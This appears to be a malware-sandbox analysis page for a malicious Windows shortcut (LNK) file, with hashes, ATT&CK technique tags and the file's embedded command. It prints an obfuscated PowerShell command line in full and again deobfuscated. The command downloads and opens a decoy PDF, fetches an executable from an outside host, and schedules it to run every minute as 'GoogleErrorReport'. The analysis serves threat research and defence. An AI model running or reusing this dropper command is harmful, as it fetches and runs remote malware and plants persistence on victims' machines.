Malicious
Malicious

8930abf86e2e94b1a4b373e25d01f2ff

LNK File
|
MD5: 8930abf86e2e94b1a4b373e25d01f2ff
|
Size: 2.55 KB
|
application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:conhost.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated

Print
General
Structural Analysis
Config.0
Yara Rules2
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
8930abf86e2e94b1a4b373e25d01f2ff
Sha1
3a83ba1264291493a8fa39b4d343c0e1ee271974
Sha256
4466995be863ec4405fc053296cfe74d0098f94e61aa89c95fa2cc80c8ad6cb9
Sha384
f94877f5797b14efc11614c949a28e39ea8b22f34cd21e8101d3999ba2b29664757075ba6dfb35861749470b2dccfb58
Sha512
ebe5c0d7152ce8ed35e6a71c6436c0a1fbb929def0c417334136f69f86b1dfce002e906f7fce5e92e6ad9bc85fbde5a919c29600def19ec35f7980876ccb2faa
SSDeep
48:8jBhv72LXXOrcOqhaMmOqhukesqAqL5dqoB6rHXv3QiYcs6N0:8jBdSLXOgdaMmdGcEQv9YbM
TLSH
4151CE182AE11624F3F24B7954BB55C08D3ABD5EFE318E9C4291D54C0861A1AFC72F2F
File Structure
8930abf86e2e94b1a4b373e25d01f2ff
LNK
Malicious
LOLBin
LOLBin:conhost.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Lnk Summary]
Malicious
Artefacts
Name
Value
LNK: Command Execution

conhost.exe powershell $ProgressPreference = 'SilentlyContinue';$b='C:\Users';iw''r https://jlu-edu.org/download/fetch/list1/18803/view/66e1c460-e71e-4dac-a35a-f2529b20e271 -OutFile $b\Public\89565254.pdf;s''a''p''s $b\Public\89565254.pdf;iw''r https://jlu-edu.org/download/fetch/list1/10884/view/fe35dfdc-e78f-4479-a142-3df61d6cbe6f -OutFile "$b\Public\hip";r''e''n -Path "$b\Public\hip" -NewName "$b\Public\Winver.exe";c''p''i "$b\Public\89565254.pdf" -destination .;sch''ta''s''ks /c''r''e''a''te /S''c minute /''t''n'' GoogleErrorReport /t''r "$b\Public\Winver" /f;e''r''a''s''e *d?.?n?

Deobfuscated PowerShell

$ProgressPreference = "SilentlyContinue" $b = "C:\Users" Invoke-WebRequest "https://jlu-edu.org/download/fetch/list1/18803/view/66e1c460-e71e-4dac-a35a-f2529b20e271" -OutFile $b\Public\89565254.pdf saps $b\Public\89565254.pdf Invoke-WebRequest "https://jlu-edu.org/download/fetch/list1/10884/view/fe35dfdc-e78f-4479-a142-3df61d6cbe6f" -OutFile "$b\Public\hip" ren -Path "$b\Public\hip" -NewName "$b\Public\Winver.exe" cpi "$b\Public\89565254.pdf" -destination "." schtasks "/create" "/Sc" "minute" "/tn" "GoogleErrorReport" "/tr" "$b\Public\Winver" "/f" Remove-Item "*d?.?n?"

8930abf86e2e94b1a4b373e25d01f2ff (2.55 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙